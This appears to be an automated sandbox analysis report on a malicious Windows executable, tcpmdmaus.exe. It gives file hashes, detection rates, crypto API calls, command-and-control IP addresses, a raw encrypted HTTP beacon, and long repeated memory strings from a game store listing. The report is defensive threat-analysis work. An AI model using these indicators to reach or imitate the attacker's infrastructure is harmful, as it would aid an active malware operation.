Windows Analysis Report tcpmdmaus.exe

ID:	497240
Product:	CloudBasic
Start time:	15:41:07
Start date:	05.10.2021
Sample:	tcpmdmaus.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	abe13ddc14525c4c35a85224689bfb27
SHA1:	01b8022edd4ef8e9ab20807c032b7ce2849b3df3
SHA256:	8524e558dded9665e69541b332d556e43c007d0d4001fe5355ac4816c22e7a21
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Network\Downloader\edb.log	data	6A977DB879538ECF271A9B3B759DA94E	80A7358EBBC0824951A3D071A20B1BB581CC3C89	6DD20771059479B00CFB42C57B224356999DC0E8B00D7130737FEC6F79ADFEF5
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db	Extensible storage user DataBase, version 0x620, checksum 0xfe58a2ca, page size 16384, DirtyShutdown, Windows version 10.0	C74A34D114B9EDD02FD41D7B4A8823D7	490E41D8B06C5A8CBBFB0BC6B4FF8C1AE65725CA	8DEE8D47503401EE5003865E9059889341E7C43C27D929CC4B88C0F7DA36A302
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm	data	EF667AACA01CCCCDFD2B92821334B044	B326E0849830C269A7D367AF92475FE62CB8688E	5B1AC376D11254DBF817DC733980A0B12D32E5B866B471DBE311FCF4243D3596
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	ASCII text, with no line terminators	DCA83F08D448911A14C22EBCACC5AD57	91270525521B7FE0D986DB19747F47D34B6318AD	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9

AV Detection:

Multi AV Scanner detection for submitted file

Source: tcpmdmaus.exe	Virustotal: Detection: 85%			Perma Link
Source: tcpmdmaus.exe	Metadefender: Detection: 16%			Perma Link
Source: tcpmdmaus.exe	ReversingLabs: Detection: 96%

Antivirus / Scanner detection for submitted sample

Source: tcpmdmaus.exe

Avira: detected

Machine Learning detection for sample

Source: tcpmdmaus.exe

Joe Sandbox ML: detected

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 0_2_003B14C9 wsprintfA,GetBinaryTypeA,GetBinaryTypeA,ReleaseCapture,GetGUIThreadInfo,DuplicateHandle,DuplicateHandle,LockFile,LockFile,CreateIconIndirect,CreateIconIndirect,GlobalDeleteAtom,SCardGetProviderIdA,CreateIconIndirect,CancelIo,AddUsersToEncryptedFile,FlsGetValue,FlsFree,		0_2_003B14C9
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 5_2_003B14C9 wsprintfA,GetBinaryTypeA,ReleaseCapture,GetGUIThreadInfo,DuplicateHandle,DuplicateHandle,LockFile,LockFile,CreateIconIndirect,CreateIconIndirect,GlobalDeleteAtom,SCardGetProviderIdA,CreateIconIndirect,CancelIo,AddUsersToEncryptedFile,FlsGetValue,FlsFree,		5_2_003B14C9
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 5_2_00CD20D9 CryptExportKey,		5_2_00CD20D9
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 5_2_00CD2435 CryptVerifySignatureW,CryptDestroyHash,		5_2_00CD2435
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 5_2_00CD21F9 CryptGenKey,CryptDestroyKey,CryptReleaseContext,		5_2_00CD21F9
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 5_2_00CD2195 CryptImportKey,LocalFree,CryptReleaseContext,		5_2_00CD2195
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 5_2_00CD2174 CryptDecodeObjectEx,CryptReleaseContext,		5_2_00CD2174
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 5_2_00CD2129 CryptGetHashParam,		5_2_00CD2129
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 5_2_00CD22A6 CryptDuplicateHash,		5_2_00CD22A6
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 5_2_00CD2261 CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,		5_2_00CD2261
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 5_2_00CD2217 CryptCreateHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,		5_2_00CD2217
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 5_2_00CD2396 CryptDuplicateHash,CryptDecrypt,CryptDestroyHash,		5_2_00CD2396
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 5_2_00CD2307 CryptEncrypt,CryptDestroyHash,		5_2_00CD2307
Source: C:\Users\user\Desktop\tcpmdmaus.exe	Code function: 5_2_00CD2336 CryptDestroyHash,		5_2_00CD2336
Source: C:\Windows\SysWOW64\sharedconnect.exe	Code function: 6_2_003B14C9 wsprintfA,GetBinaryTypeA,GetBinaryTypeA,ReleaseCapture,GetGUIThreadInfo,DuplicateHandle,DuplicateHandle,LockFile,LockFile,CreateIconIndirect,CreateIconIndirect,GlobalDeleteAtom,SCardGetProviderIdA,CreateIconIndirect,CancelIo,AddUsersToEncryptedFile,FlsGetValue,FlsFree,		6_2_003B14C9
Source: C:\Windows\SysWOW64\sharedconnect.exe	Code function: 7_2_003B14C9 wsprintfA,GetBinaryTypeA,ReleaseCapture,GetGUIThreadInfo,DuplicateHandle,DuplicateHandle,LockFile,LockFile,CreateIconIndirect,CreateIconIndirect,GlobalDeleteAtom,SCardGetProviderIdA,CreateIconIndirect,CancelIo,AddUsersToEncryptedFile,FlsGetValue,FlsFree,		7_2_003B14C9
Source: C:\Windows\SysWOW64\sharedconnect.exe	Code function: 7_2_01482195 CryptImportKey,LocalFree,CryptReleaseContext,		7_2_01482195
Source: C:\Windows\SysWOW64\sharedconnect.exe	Code function: 7_2_01482336 CryptDestroyHash,		7_2_01482336
Source: C:\Windows\SysWOW64\sharedconnect.exe	Code function: 7_2_01482129 CryptGetHashParam,		7_2_01482129
Source: C:\Windows\SysWOW64\sharedconnect.exe	Code function: 7_2_01482435 CryptVerifySignatureW,CryptDestroyHash,		7_2_01482435
Source: C:\Windows\SysWOW64\sharedconnect.exe	Code function: 7_2_01482261 CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,		7_2_01482261
Source: C:\Windows\SysWOW64\sharedconnect.exe	Code function: 7_2_014822A6 CryptDuplicateHash,		7_2_014822A6

Compliance:

Uses 32bit PE files

Source: tcpmdmaus.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: tcpmdmaus.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Source:

Binary string: ewjrRWJW##@HRh.pdb source: tcpmdmaus.exe

Networking:

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 24.217.117.217 24.217.117.217

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 77.157.40.119:443Content-Length: 388Connection: Keep-AliveCache-Control: no-cacheData Raw: 2e f5 8d 30 20 97 63 af c8 5c 78 1d 1b 05 84 50 56 8e 19 5b d4 5e 84 69 7f 59 6c 87 46 e0 d0 59 8a f6 f3 38 80 a7 31 36 2a 41 93 7c 48 14 e8 94 4c f9 4b a4 47 e8 3f dd ae dc 2e 2b a6 0b 4e 9c 34 a8 33 bf b2 99 f0 55 30 50 57 c9 c7 08 84 57 c2 87 fe ef f4 fc 77 58 f0 6b 96 ac 8a dc 86 e9 20 3d c9 74 db ea 0a ab 88 74 c8 a2 da fc ca 06 27 02 7e a7 63 dd 3c 82 37 62 c3 a8 6a 68 12 a6 6c 70 b1 91 2e 31 24 27 9d ec 9e b1 3c 60 67 ed 52 57 23 21 97 d1 43 4b 2b f3 c0 e1 d7 82 bd 52 05 c3 43 20 17 61 0a dc ab cd c6 64 a6 a4 fe c2 c1 49 a3 e5 b5 c1 14 51 03 79 f0 cd 9d 37 2c 80 ec 86 6d 01 ab 1d 6e 2b af 18 4a 34 7e 89 f2 2d df ca f3 76 fb 2a 58 a0 da 6e 5b b3 e4 35 ff 79 1c 08 46 4f f8 f4 d1 97 26 3f 57 f1 fe 15 cb 39 c2 3f 9a 59 61 23 4a 83 97 0b 58 bb b3 e5 2d a3 fb 9e bd 22 dc 9e 9e e9 b1 bf 77 80 43 48 4f 42 61 24 17 ab 8b 56 2a d4 4c c4 56 1c 00 70 44 c3 81 65 e6 f8 8f 76 25 88 52 c6 8c 6e 33 f3 e4 0e 60 c1 63 0e 7a 7b 6f 50 ab 44 30 93 04 9f e4 a9 3a 73 17 af 84 fb 97 c1 dd 90 81 87 1b d4 f8 ce e1 a3 09 5c f0 44 44 8f 9c 35 7c bc 2a c5 93 40 4e 97 a2 d9 5b ed bd de 1b 90 8c 2a 61 27 49 13 6f 1a d4 55 91 07 0b ff b1 62 6e ec f2 b1 b2 df 1a d2 2d c8 Data Ascii: .0 c\xPV[^iYlFY816*A|HLKG?.+N43U0PWWwXk =tt'~c<7bjhlp.1$'<`gRW#!CK+RC adIQy7,mn+J4~-v*Xn[5yFO&?W9?Ya#JX-"wCHOBa$V*LVpDev%Rn3`cz{oPD0:s\DD5|*@N[*a'IoUbn-

Detected TCP or UDP traffic on non-standard ports

Source: global traffic	TCP traffic: 192.168.2.6:49840 -> 66.220.110.56:50000
Source: global traffic	TCP traffic: 192.168.2.6:49848 -> 197.82.220.82:8080
Source: global traffic	TCP traffic: 192.168.2.6:49851 -> 212.83.128.139:8080
Source: global traffic	TCP traffic: 192.168.2.6:49852 -> 139.162.216.32:8080

Uses HTTPS

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443

Connects to IPs without corresponding DNS lookups

Source: unknown	TCP traffic detected without corresponding DNS query: 184.186.78.177
Source: unknown	TCP traffic detected without corresponding DNS query: 184.186.78.177
Source: unknown	TCP traffic detected without corresponding DNS query: 184.186.78.177
Source: unknown	TCP traffic detected without corresponding DNS query: 197.82.220.82
Source: unknown	TCP traffic detected without corresponding DNS query: 197.82.220.82
Source: unknown	TCP traffic detected without corresponding DNS query: 197.82.220.82
Source: unknown	TCP traffic detected without corresponding DNS query: 77.157.40.119
Source: unknown	TCP traffic detected without corresponding DNS query: 77.157.40.119
Source: unknown	TCP traffic detected without corresponding DNS query: 77.157.40.119
Source: unknown	TCP traffic detected without corresponding DNS query: 24.217.117.217
Source: unknown	TCP traffic detected without corresponding DNS query: 24.217.117.217
Source: unknown	TCP traffic detected without corresponding DNS query: 24.217.117.217
Source: unknown	TCP traffic detected without corresponding DNS query: 212.83.128.139
Source: unknown	TCP traffic detected without corresponding DNS query: 212.83.128.139
Source: unknown	TCP traffic detected without corresponding DNS query: 212.83.128.139
Source: unknown	TCP traffic detected without corresponding DNS query: 139.162.216.32
Source: unknown	TCP traffic detected without corresponding DNS query: 139.162.216.32
Source: unknown	TCP traffic detected without corresponding DNS query: 139.162.216.32

Found strings which match to known social media urls

Source: svchost.exe, 0000000E.00000003.457402340.0000012F65002000.00000004.00000001.sdmp	String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e
Source: svchost.exe, 0000000E.00000003.457402340.0000012F65002000.00000004.00000001.sdmp	String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e
Source: svchost.exe, 0000000E.00000003.457402340.0000012F65002000.00000004.00000001.sdmp	String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e
Source: svchost.exe, 0000000E.00000003.457356893.0000012F64B91000.00000004.00000001.sdmp	String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6
Source: svchost.exe, 0000000E.00000003.457356893.0000012F64B91000.00000004.00000001.sdmp	String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6
Source: svchost.exe, 0000000E.00000003.457356893.0000012F64B91000.00000004.00000001.sdmp	String found in binary or memory: re offline or online.\r\n______________________________\r\n\r\nVisit us: www.g5e.com\r\nWatch us: www.youtube.com/g5enter\r\nFind us: www.facebook.com/HiddenCityGame\r\nFollow us: www.twitter.com/g5games\r\nJoin us: www.instagram.com/hiddencity_\r\nGame FAQs: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure\r\nTerms of Service: http://www.g5e.com/termsofservice\r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 